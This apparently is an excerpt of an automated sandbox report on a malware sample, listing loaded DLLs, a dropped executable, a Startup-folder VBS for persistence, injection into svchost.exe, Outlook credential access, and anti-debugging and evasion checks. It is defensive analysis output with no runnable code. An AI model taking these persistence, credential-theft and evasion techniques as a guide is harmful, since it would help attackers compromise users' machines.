Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Drops VBS files to the startup folder

Source: cnaniAxghZ.exe

Static file information: File size 1355776 > 1048576

Source: cnaniAxghZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cnaniAxghZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cnaniAxghZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cnaniAxghZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cnaniAxghZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cnaniAxghZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: cnaniAxghZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000005.00000003.2819399918.0000000004030000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2820079168.00000000041D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000005.00000003.2819399918.0000000004030000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2820079168.00000000041D0000.00000004.00001000.00020000.00000000.sdmp

Source: cnaniAxghZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cnaniAxghZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cnaniAxghZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cnaniAxghZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cnaniAxghZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_0008C304 LoadLibraryA,GetProcAddress,

0_2_0008C304

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0001C590 push eax; retn 0001h	0_2_0001C599
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00078719 push FFFFFF8Bh; iretd	0_2_0007871B
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0003E94F push edi; ret	0_2_0003E951
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0003EA68 push esi; ret	0_2_0003EA6A
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00038B85 push ecx; ret	0_2_00038B98
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0003EC43 push esi; ret	0_2_0003EC45
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0003ED2C push edi; ret	0_2_0003ED2E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000AC590 push eax; retn 000Ah	5_2_000AC599
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00108719 push FFFFFF8Bh; iretd	5_2_0010871B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000CE94F push edi; ret	5_2_000CE951
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000CEA68 push esi; ret	5_2_000CEA6A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000C8B85 push ecx; ret	5_2_000C8B98
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000CEC43 push esi; ret	5_2_000CEC45
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000CED2C push edi; ret	5_2_000CED2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00457106 push ecx; ret	6_2_00457119
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0045B11A push esp; ret	6_2_0045B141
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00457A28 push eax; ret	6_2_00457A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00434E56 push ecx; ret	6_2_00434E69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044693D push ecx; ret	7_2_0044694D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044DB70 push eax; ret	7_2_0044DB84
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044DB70 push eax; ret	7_2_0044DBAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00451D54 push eax; ret	7_2_00451D61

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_00406EB0 ShellExecuteW,URLDownloadToFileW,

6_2_00406EB0

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

File created: C:\Users\user\AppData\Local\directory\name.exe

Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Delayed program exit found

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

6_2_0041AA4A

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00014A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_00014A35
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_000955FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_000955FD
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000A4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	5_2_000A4A35
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_001255FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	5_2_001255FD

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_000333C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000333C7

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_0040F7A7 Sleep,ExitProcess,

6_2_0040F7A7

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\directory\name.exe

API/Special instruction interceptor: Address: 3B932D4

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

7_2_0040DD85

Source: C:\Windows\SysWOW64\svchost.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

6_2_0041A748

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-98362

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	API coverage: 4.6 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 4.9 %

Source: C:\Windows\SysWOW64\svchost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00074696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00074696
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007C93C FindFirstFileW,FindClose,	0_2_0007C93C
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0007C9C7
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0007F200
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0007F35D
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0007F65E
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00073A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00073A2B
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00073D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00073D4E
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0007BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0007BF27
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00104696 GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00104696
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010C93C FindFirstFileW,FindClose,	5_2_0010C93C
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_0010C9C7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_0010F200
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_0010F35D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	5_2_0010F65E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00103A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00103A2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00103D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00103D4E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_0010BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	5_2_0010BF27
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	6_2_00409253
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	6_2_0041C291
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	6_2_0040C34D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	6_2_00409665
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	6_2_0040880C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040783C FindFirstFileW,FindNextFileW,	6_2_0040783C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	6_2_00419AF5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	6_2_0040BB30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	6_2_0040BD37
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040AE51 FindFirstFileW,FindNextFileW,	7_2_0040AE51

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

6_2_00407C97

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00014AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00014AFE

Source: svchost.exe, 00000006.00000002.2877334638.0000000003068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2840816406.0000000003068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2841755060.0000000003068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2877524808.000000000308A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2839396466.0000000003068000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bhv5230.tmp.7.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: svchost.exe, 00000006.00000002.2877257882.0000000003012000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: bhv5230.tmp.7.dr	Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	API call chain: ExitProcess graph end node	graph_0-98176
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	API call chain: ExitProcess graph end node	graph_0-97747
Source: C:\Users\user\AppData\Local\directory\name.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\directory\name.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
